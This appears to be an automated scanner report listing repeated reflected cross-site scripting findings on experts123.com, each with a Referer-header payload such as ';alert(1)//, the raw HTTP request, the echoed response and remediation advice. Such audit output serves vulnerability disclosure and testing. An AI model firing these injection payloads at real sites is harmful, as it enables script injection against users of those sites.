The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58da2'%3balert(1)//bbd7524fdca was submitted in the Referer HTTP header. This input was echoed as 58da2';alert(1)//bbd7524fdca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/how-are-mortgage-properties-registered.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=58da2'%3balert(1)//bbd7524fdca
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:17 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:17 GMT
Connection: close
Content-Length: 30482
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcd6c"%3balert(1)//f1f27091f7b was submitted in the Referer HTTP header. This input was echoed as bcd6c";alert(1)//f1f27091f7b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/how-are-mortgage-properties-registered.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=bcd6c"%3balert(1)//f1f27091f7b
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:16 GMT
Connection: close
Content-Length: 30482
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "bcd6c";alert(1)//f1f27091f7b"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fdc6b'%3balert(1)//1fcabebdc24 was submitted in the Referer HTTP header. This input was echoed as fdc6b';alert(1)//1fcabebdc24 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what's-the-best-checking-account-for-me.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=fdc6b'%3balert(1)//1fcabebdc24
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:13 GMT
Connection: close
Content-Length: 29547
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25f3f"%3balert(1)//41fc69da3be was submitted in the Referer HTTP header. This input was echoed as 25f3f";alert(1)//41fc69da3be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what's-the-best-checking-account-for-me.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=25f3f"%3balert(1)//41fc69da3be
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:13 GMT
Connection: close
Content-Length: 29547
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "25f3f";alert(1)//41fc69da3be"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccc8e'%3balert(1)//6bb3a5f1c5f was submitted in the Referer HTTP header. This input was echoed as ccc8e';alert(1)//6bb3a5f1c5f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-a-checking-account-limit.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ccc8e'%3balert(1)//6bb3a5f1c5f
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:14 GMT
Connection: close
Content-Length: 33335
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1947f"%3balert(1)//760c35e1ead was submitted in the Referer HTTP header. This input was echoed as 1947f";alert(1)//760c35e1ead in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-a-checking-account-limit.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1947f"%3balert(1)//760c35e1ead
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:14 GMT
Connection: close
Content-Length: 33335
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "1947f";alert(1)//760c35e1ead"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a50b1'%3balert(1)//6a7613daa75 was submitted in the Referer HTTP header. This input was echoed as a50b1';alert(1)//6a7613daa75 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-a-commercial-mortgage-lender.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a50b1'%3balert(1)//6a7613daa75
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:16 GMT
Connection: close
Content-Length: 31563
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5395"%3balert(1)//8cf555a3bfa was submitted in the Referer HTTP header. This input was echoed as d5395";alert(1)//8cf555a3bfa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-a-commercial-mortgage-lender.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d5395"%3balert(1)//8cf555a3bfa
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:16 GMT
Connection: close
Content-Length: 31563
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "d5395";alert(1)//8cf555a3bfa"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a44e'%3balert(1)//5f700a46bff was submitted in the Referer HTTP header. This input was echoed as 1a44e';alert(1)//5f700a46bff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-a-mortgage-lender.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1a44e'%3balert(1)//5f700a46bff
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:35:58 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:35:57 GMT
Connection: close
Content-Length: 34659
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dacf1"%3balert(1)//155dee88ae4 was submitted in the Referer HTTP header. This input was echoed as dacf1";alert(1)//155dee88ae4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-a-mortgage-lender.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=dacf1"%3balert(1)//155dee88ae4
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:35:57 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:35:56 GMT
Connection: close
Content-Length: 34659
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "dacf1";alert(1)//155dee88ae4"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2ffb'%3balert(1)//2017b493094 was submitted in the Referer HTTP header. This input was echoed as c2ffb';alert(1)//2017b493094 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-a-mortgage.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c2ffb'%3balert(1)//2017b493094
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 85378
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6163"%3balert(1)//498765472fb was submitted in the Referer HTTP header. This input was echoed as d6163";alert(1)//498765472fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-a-mortgage.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d6163"%3balert(1)//498765472fb
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 85378
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "d6163";alert(1)//498765472fb"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0800"%3balert(1)//0d9e6834871 was submitted in the Referer HTTP header. This input was echoed as d0800";alert(1)//0d9e6834871 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-an-online-checking-account.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d0800"%3balert(1)//0d9e6834871
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:13 GMT
Connection: close
Content-Length: 33683
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "d0800";alert(1)//0d9e6834871"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aaeae'%3balert(1)//9e376e61a79 was submitted in the Referer HTTP header. This input was echoed as aaeae';alert(1)//9e376e61a79 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-an-online-checking-account.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=aaeae'%3balert(1)//9e376e61a79
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:14 GMT
Connection: close
Content-Length: 33683
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11ee8"%3balert(1)//0fd04f86b98 was submitted in the Referer HTTP header. This input was echoed as 11ee8";alert(1)//0fd04f86b98 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=11ee8"%3balert(1)//0fd04f86b98
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 46266
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo ...[SNIP]... USERNAME = ""; var USERID = ""; var PROFILE_URL = ""; var GOOGLE_API_KEY = "ABQIAAAAcRGdvpiMEwEwWXs1S4XT8BT5hIv4UWzHWp5UXUWPJ9WyHBGHHBQZys70u_wUuQ6cH86QKzAVqOnPvA"; var REFERRAL = "11ee8";alert(1)//0fd04f86b98"; var RSQ = true;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71c11'%3balert(1)//0c64a2d8a24 was submitted in the Referer HTTP header. This input was echoed as 71c11';alert(1)//0c64a2d8a24 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /q/what-is-the-difference-between-a-mortgage-broker-and-a-mortgage-banker.html HTTP/1.1
Host: www.experts123.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=71c11'%3balert(1)//0c64a2d8a24
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
Set-Cookie: cbr=; expires=Tue, 03-Feb-1981 16:36:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 16:36:07 GMT
Connection: close
Content-Length: 46266
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aeb3b"%3balert(1)//3f4b39407ec was submitted in the Referer HTTP header. This input was echoed as aeb3b";alert(1)//3f4b39407ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
